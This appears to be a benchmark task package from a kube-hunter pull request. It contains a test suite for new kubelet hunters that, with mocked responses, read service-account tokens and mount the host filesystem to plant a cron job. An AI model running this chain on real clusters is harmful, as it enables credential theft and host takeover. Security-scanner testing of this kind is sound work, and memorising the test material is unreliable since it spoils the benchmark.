+ + temp_message + ) + + self.event.evidence = "{}".format(message) + + @handler.subscribe(ExposedRunHandler) class ProveRunHandler(ActiveHunter): """Kubelet Run Hunter diff --git a/requirements-dev.txt b/requirements-dev.txt index 1c42d0a..f6f69a7 100644 --- a/requirements-dev.txt +++ b/requirements-dev.txt @@ -2,7 +2,7 @@ flake8 pytest >= 2.9.1 -requests-mock +requests-mock >= 1.8 coverage < 5.0 pytest-cov setuptools >= 30.3.0
Two new kubelet active hunters. <!--- Thank you for contributing to Aqua Security. Please don't remove the template. --> ## Description I'm introducing two new active hunters: - FootholdViaSecureKubeletPort - MaliciousIntentViaSecureKubeletPort Both active hunters enable a deeper analysis on how malicious actors could benefit of a mis-configured secure kubelet port. ## Contribution Guidelines Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md). ## Fixed Issues Please mention any issues fixed in the PR by referencing it properly in the commit message. As per the convention, use appropriate keywords such as `fixes`, `closes`, `resolves` to automatically refer the issue. Please consult [official github documentation](https://help.github.com/en/github/managing-your-work-on-github/closing-issues-using-keywords) for details. Fixes #(issue) ## "BEFORE" and "AFTER" output To verify that the change works as desired, please include an output of terminal before and after the changes under headings "BEFORE" and "AFTER". ### BEFORE Any Terminal Output Before Changes. ### AFTER Any Terminal Output Before Changes. ## Contribution checklist - [x] I have read the Contributing Guidelines. - [ ] The commits refer to an active issue in the repository. - [x] I have added automated testing to cover this case. ## Notes This piece of work is unrelated to any active issue in the repository. It brings additional functionality.
**Title** Add active hunters for exposing and exploiting privileged containers via an insecure kubelet secure port **Problem** When the kubelet’s secure port permits anonymous requests, privileged containers become reachable from outside the cluster. An attacker can read service‑account tokens, enumerate environment variables, and potentially mount the host filesystem to start or modify host‑level processes. **Root Cause** Mis‑configuration that enables anonymous authentication on the kubelet’s HTTPS API together with the presence of privileged containers (or containers with `SYS_ADMIN` capabilities) gives unauthenticated users direct access to container runtimes. **Fix / Expected Behavior** - Introduce a hunter that validates anonymous access to the kubelet, enumerates pods, extracts tokens, and flags any privileged containers, publishing a new vulnerability event. - Introduce a second hunter that, upon detection of such containers, attempts to mount the host filesystem and create/execute a cron job to demonstrate host compromise, reporting success or failure. - Add comprehensive documentation describing the issue, remediation steps, and references. - Bump the `requests-mock` development dependency to satisfy version constraints. **Risk & Validation** - The new hunters are triggered only after the anonymous‑auth event, minimizing unnecessary traffic on healthy clusters. - Unit tests cover the new detection and exploitation logic; integration tests verify that the vulnerability is reported only when the insecure configuration exists. - Documentation builds successfully, and the updated dependency does not break existing test suites.
344
aquasecurity/kube-hunter
diff --git a/tests/core/test_handler.py b/tests/core/test_handler.py index 5c48975..5ccc71e 100644 --- a/tests/core/test_handler.py +++ b/tests/core/test_handler.py @@ -28,11 +28,13 @@ from kube_hunter.modules.hunting.dashboard import KubeDashboard from kube_hunter.modules.hunting.dns import DnsSpoofHunter from kube_hunter.modules.hunting.etcd import EtcdRemoteAccess, EtcdRemoteAccessActive from kube_hunter.modules.hunting.kubelet import ( - ReadOnlyKubeletPortHunter, - SecureKubeletPortHunter, - ProveRunHandler, + ProveAnonymousAuth, + MaliciousIntentViaSecureKubeletPort, ProveContainerLogsHandler, + ProveRunHandler, ProveSystemLogs, + ReadOnlyKubeletPortHunter, + SecureKubeletPortHunter, ) from kube_hunter.modules.hunting.mounts import VarLogMountHunter, ProveVarLogMount from kube_hunter.modules.hunting.proxy import KubeProxy, ProveProxyExposed, K8sVersionDisclosureProve @@ -77,6 +79,8 @@ ACTIVE_HUNTERS = { ProveVarLogMount, ProveProxyExposed, K8sVersionDisclosureProve, + ProveAnonymousAuth, + MaliciousIntentViaSecureKubeletPort, } diff --git a/tests/hunting/test_kubelet.py b/tests/hunting/test_kubelet.py new file mode 100644 index 0000000..1b54e87 --- /dev/null +++ b/tests/hunting/test_kubelet.py @@ -0,0 +1,723 @@ +import requests +import requests_mock +import urllib.parse +import uuid + +from kube_hunter.core.events import handler +from kube_hunter.modules.hunting.kubelet import ( + AnonymousAuthEnabled, + ExposedExistingPrivilegedContainersViaSecureKubeletPort, + ProveAnonymousAuth, + MaliciousIntentViaSecureKubeletPort, +) + +counter = 0 +pod_list_with_privileged_container = """{ + "kind": "PodList", + "apiVersion": "v1", + "metadata": {}, + "items": [ + { + "metadata": { + "name": "kube-hunter-privileged-deployment-86dc79f945-sjjps", + "namespace": "kube-hunter-privileged" + }, + "spec": { + "containers": [ + { + "name": "ubuntu", + "securityContext": { + {security_context_definition_to_test} + } + } + ] + } + } + ] +} +""" +service_account_token = 
"eyJhbGciOiJSUzI1NiIsImtpZCI6IlR0YmxoMXh..." +env = """PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +HOSTNAME=kube-hunter-privileged-deployment-86dc79f945-sjjps +KUBERNETES_SERVICE_PORT=443 +KUBERNETES_SERVICE_PORT_HTTPS=443 +KUBERNETES_PORT=tcp://10.96.0.1:443 +KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443 +KUBERNETES_PORT_443_TCP_PROTO=tcp +KUBERNETES_PORT_443_TCP_PORT=443 +KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1 +KUBERNETES_SERVICE_HOST=10.96.0.1 +HOME=/root""" +exposed_privileged_containers = [ + { + "container_name": "ubuntu", + "environment_variables": env, + "pod_id": "kube-hunter-privileged-deployment-86dc79f945-sjjps", + "pod_namespace": "kube-hunter-privileged", + "service_account_token": service_account_token, + } +] +cat_proc_cmdline = "BOOT_IMAGE=/boot/bzImage root=LABEL=Mock loglevel=3 console=ttyS0" +number_of_rm_attempts = 1 +number_of_umount_attempts = 1 +number_of_rmdir_attempts = 1 + + +def create_test_event_type_one(): + anonymous_auth_enabled_event = AnonymousAuthEnabled() + + anonymous_auth_enabled_event.host = "localhost" + anonymous_auth_enabled_event.session = requests.Session() + + return anonymous_auth_enabled_event + + +def create_test_event_type_two(): + exposed_existing_privileged_containers_via_secure_kubelet_port_event = ExposedExistingPrivilegedContainersViaSecureKubeletPort( + exposed_privileged_containers + ) + exposed_existing_privileged_containers_via_secure_kubelet_port_event.host = "localhost" + exposed_existing_privileged_containers_via_secure_kubelet_port_event.session = requests.Session() + + return exposed_existing_privileged_containers_via_secure_kubelet_port_event + + +def test_get_request_valid_url(): + class_being_tested = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/mock" + + session_mock.get(url, text="mock") + + return_value = class_being_tested.get_request(url) + + assert 
return_value == "mock" + + +def test_get_request_invalid_url(): + class_being_tested = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/[mock]" + + session_mock.get(url, exc=requests.exceptions.InvalidURL) + + return_value = class_being_tested.get_request(url) + + assert return_value.startswith("Exception: ") + + +def post_request(url, params, expected_return_value, exception=None): + class_being_tested_one = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested_one.event.session) as session_mock: + mock_params = {"text": "mock"} if not exception else {"exc": exception} + session_mock.post(url, **mock_params) + + return_value = class_being_tested_one.post_request(url, params) + + assert return_value == expected_return_value + + class_being_tested_two = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two()) + + with requests_mock.Mocker(session=class_being_tested_two.event.session) as session_mock: + mock_params = {"text": "mock"} if not exception else {"exc": exception} + session_mock.post(url, **mock_params) + + return_value = class_being_tested_two.post_request(url, params) + + assert return_value == expected_return_value + + +def test_post_request_valid_url_with_parameters(): + url = "https://localhost:10250/mock?cmd=ls" + params = {"cmd": "ls"} + post_request(url, params, expected_return_value="mock") + + +def test_post_request_valid_url_without_parameters(): + url = "https://localhost:10250/mock" + params = {} + post_request(url, params, expected_return_value="mock") + + +def test_post_request_invalid_url_with_parameters(): + url = "https://localhost:10250/mock?cmd=ls" + params = {"cmd": "ls"} + post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL) + + +def test_post_request_invalid_url_without_parameters(): + url = 
"https://localhost:10250/mock" + params = {} + post_request(url, params, expected_return_value="Exception: ", exception=requests.exceptions.InvalidURL) + + +def test_has_no_exception_result_with_exception(): + mock_result = "Exception: Mock." + + return_value = ProveAnonymousAuth.has_no_exception(mock_result) + + assert return_value is False + + +def test_has_no_exception_result_without_exception(): + mock_result = "Mock." + + return_value = ProveAnonymousAuth.has_no_exception(mock_result) + + assert return_value is True + + +def test_has_no_error_result_with_error(): + mock_result = "Mock exited with error." + + return_value = ProveAnonymousAuth.has_no_error(mock_result) + + assert return_value is False + + +def test_has_no_error_result_without_error(): + mock_result = "Mock." + + return_value = ProveAnonymousAuth.has_no_error(mock_result) + + assert return_value is True + + +def test_has_no_error_nor_exception_result_without_exception_and_without_error(): + mock_result = "Mock." + + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is True + + +def test_has_no_error_nor_exception_result_with_exception_and_without_error(): + mock_result = "Exception: Mock." + + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is False + + +def test_has_no_error_nor_exception_result_without_exception_and_with_error(): + mock_result = "Mock exited with error." + + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is False + + +def test_has_no_error_nor_exception_result_with_exception_and_with_error(): + mock_result = "Exception: Mock. Mock exited with error." 
+ + return_value = ProveAnonymousAuth.has_no_error_nor_exception(mock_result) + + assert return_value is False + + +def proveanonymousauth_success(anonymous_auth_enabled_event, security_context_definition_to_test): + global counter + counter = 0 + + with requests_mock.Mocker(session=anonymous_auth_enabled_event.session) as session_mock: + url = "https://" + anonymous_auth_enabled_event.host + ":10250/" + listing_pods_url = url + "pods" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + + session_mock.get( + listing_pods_url, + text=pod_list_with_privileged_container.replace( + "{security_context_definition_to_test}", security_context_definition_to_test + ), + ) + session_mock.post( + run_url + urllib.parse.quote("cat /var/run/secrets/kubernetes.io/serviceaccount/token", safe=""), + text=service_account_token, + ) + session_mock.post(run_url + "env", text=env) + + class_being_tested = ProveAnonymousAuth(anonymous_auth_enabled_event) + class_being_tested.execute() + + assert "The following containers have been successfully breached." 
in class_being_tested.event.evidence + + assert counter == 1 + + +def test_proveanonymousauth_success_with_privileged_container_via_privileged_setting(): + proveanonymousauth_success(create_test_event_type_one(), '"privileged": true') + + +def test_proveanonymousauth_success_with_privileged_container_via_capabilities(): + proveanonymousauth_success(create_test_event_type_one(), '"capabilities": { "add": ["SYS_ADMIN"] }') + + +def test_proveanonymousauth_connectivity_issues(): + class_being_tested = ProveAnonymousAuth(create_test_event_type_one()) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://" + class_being_tested.event.host + ":10250/" + listing_pods_url = url + "pods" + + session_mock.get(listing_pods_url, exc=requests.exceptions.ConnectionError) + + class_being_tested.execute() + + assert class_being_tested.event.evidence == "" + + +@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort) +class ExposedPrivilegedContainersViaAnonymousAuthEnabledInSecureKubeletPortEventCounter(object): + def __init__(self, event): + global counter + counter += 1 + + +def test_check_file_exists_existing_file(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt") + + return_value = class_being_tested.check_file_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "mock.txt" + ) + + assert return_value is True + + +def test_check_file_exists_non_existent_file(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with 
requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("ls nonexistentmock.txt", safe=""), + text="ls: nonexistentmock.txt: No such file or directory", + ) + + return_value = class_being_tested.check_file_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "nonexistentmock.txt", + ) + + assert return_value is False + + +rm_command_removed_successfully_callback_counter = 0 + + +def rm_command_removed_successfully_callback(request, context): + global rm_command_removed_successfully_callback_counter + + if rm_command_removed_successfully_callback_counter == 0: + rm_command_removed_successfully_callback_counter += 1 + return "mock.txt" + else: + return "ls: mock.txt: No such file or directory" + + +def test_rm_command_removed_successfully(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("ls mock.txt", safe=""), text=rm_command_removed_successfully_callback + ) + session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="") + + return_value = class_being_tested.rm_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "mock.txt", + number_of_rm_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is True + + +def test_rm_command_removed_failed(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with 
requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls mock.txt", safe=""), text="mock.txt") + session_mock.post(run_url + urllib.parse.quote("rm -f mock.txt", safe=""), text="Permission denied") + + return_value = class_being_tested.rm_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "mock.txt", + number_of_rm_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is False + + +def test_attack_exposed_existing_privileged_container_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text="" + ) + + return_value = class_being_tested.attack_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + directory_created, + number_of_rm_attempts, + None, + file_name, + ) + + assert return_value["result"] is True + + +def test_attack_exposed_existing_privileged_container_failure_when_touch(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with 
requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), + text="Operation not permitted", + ) + + return_value = class_being_tested.attack_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + directory_created, + None, + file_name, + ) + + assert return_value["result"] is False + + +def test_attack_exposed_existing_privileged_container_failure_when_chmod(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), + text="Permission denied", + ) + + return_value = class_being_tested.attack_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + directory_created, + None, + file_name, + ) + + assert return_value["result"] is False + + +def 
test_check_directory_exists_existing_directory(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt") + + return_value = class_being_tested.check_directory_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock" + ) + + assert return_value is True + + +def test_check_directory_exists_non_existent_directory(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="ls: Mock: No such file or directory") + + return_value = class_being_tested.check_directory_exists( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", "Mock" + ) + + assert return_value is False + + +rmdir_command_removed_successfully_callback_counter = 0 + + +def rmdir_command_removed_successfully_callback(request, context): + global rmdir_command_removed_successfully_callback_counter + + if rmdir_command_removed_successfully_callback_counter == 0: + rmdir_command_removed_successfully_callback_counter += 1 + return "mock.txt" + else: + return "ls: Mock: No such file or directory" + + +def test_rmdir_command_removed_successfully(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as 
session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post( + run_url + urllib.parse.quote("ls Mock", safe=""), text=rmdir_command_removed_successfully_callback + ) + session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="") + + return_value = class_being_tested.rmdir_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "Mock", + number_of_rmdir_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is True + + +def test_rmdir_command_removed_failed(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + session_mock.post(run_url + urllib.parse.quote("ls Mock", safe=""), text="mock.txt") + session_mock.post(run_url + urllib.parse.quote("rmdir Mock", safe=""), text="Permission denied") + + return_value = class_being_tested.rmdir_command( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + "Mock", + number_of_rmdir_attempts=1, + seconds_to_wait_for_os_command=None, + ) + + assert return_value is False + + +def test_get_root_values_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + root_value, root_value_type = class_being_tested.get_root_values(cat_proc_cmdline) + + assert root_value == "Mock" and root_value_type == "LABEL=" + + +def test_get_root_values_failure(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + root_value, root_value_type = class_being_tested.get_root_values("") + + assert root_value is None and root_value_type 
is None + + +def test_process_exposed_existing_privileged_container_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text="" + ) + session_mock.post( + run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), text="mockhostname" + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is True + + +def test_process_exposed_existing_privileged_container_failure_when_cat_cmdline(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text="Permission denied") + + return_value = 
class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_findfs(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="Permission denied") + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_mkdir(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post( + 
run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="Permission denied" + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_mount(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), + text="Permission denied", + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_process_exposed_existing_privileged_container_failure_when_cat_hostname(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + 
"run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text="" + ) + session_mock.post( + run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), + text="Permission denied", + ) + + return_value = class_being_tested.process_exposed_existing_privileged_container( + url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu", + number_of_umount_attempts, + number_of_rmdir_attempts, + None, + directory_created, + ) + + assert return_value["result"] is False + + +def test_maliciousintentviasecurekubeletport_success(): + class_being_tested = MaliciousIntentViaSecureKubeletPort(create_test_event_type_two(), None) + + with requests_mock.Mocker(session=class_being_tested.event.session) as session_mock: + url = "https://localhost:10250/" + run_url = url + "run/kube-hunter-privileged/kube-hunter-privileged-deployment-86dc79f945-sjjps/ubuntu?cmd=" + directory_created = "/kube-hunter-mock_" + str(uuid.uuid1()) + file_name = "kube-hunter-mock" + str(uuid.uuid1()) + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + session_mock.post(run_url + urllib.parse.quote("cat /proc/cmdline", safe=""), text=cat_proc_cmdline) + session_mock.post(run_url + urllib.parse.quote("findfs LABEL=Mock", safe=""), text="/dev/mock_fs") + session_mock.post(run_url + urllib.parse.quote("mkdir {}".format(directory_created), safe=""), text="") + session_mock.post( + run_url + 
urllib.parse.quote("mount {} {}".format("/dev/mock_fs", directory_created), safe=""), text="" + ) + session_mock.post( + run_url + urllib.parse.quote("cat {}/etc/hostname".format(directory_created), safe=""), text="mockhostname" + ) + session_mock.post(run_url + urllib.parse.quote("touch {}".format(file_name_with_path), safe=""), text="") + session_mock.post( + run_url + urllib.parse.quote("chmod {} {}".format("755", file_name_with_path), safe=""), text="" + ) + + class_being_tested.execute(directory_created, file_name) + + message = "The following exposed existing privileged containers have been successfully" + message += " abused by starting/modifying a process in the host." + + assert message in class_being_tested.event.evidence
[ "tests/core/test_handler.py::test_passive_hunters_registered", "tests/core/test_handler.py::test_active_hunters_registered", "tests/core/test_handler.py::test_all_hunters_registered", "tests/hunting/test_kubelet.py::test_get_request_valid_url", "tests/hunting/test_kubelet.py::test_get_request_invalid_url", "tests/hunting/test_kubelet.py::test_post_request_valid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_valid_url_without_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_without_parameters", "tests/hunting/test_kubelet.py::test_has_no_exception_result_with_exception", "tests/hunting/test_kubelet.py::test_has_no_exception_result_without_exception", "tests/hunting/test_kubelet.py::test_has_no_error_result_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_result_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_with_error", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_privileged_setting", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_capabilities", "tests/hunting/test_kubelet.py::test_proveanonymousauth_connectivity_issues", "tests/hunting/test_kubelet.py::test_check_file_exists_existing_file", "tests/hunting/test_kubelet.py::test_check_file_exists_non_existent_file", "tests/hunting/test_kubelet.py::test_rm_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rm_command_removed_failed", 
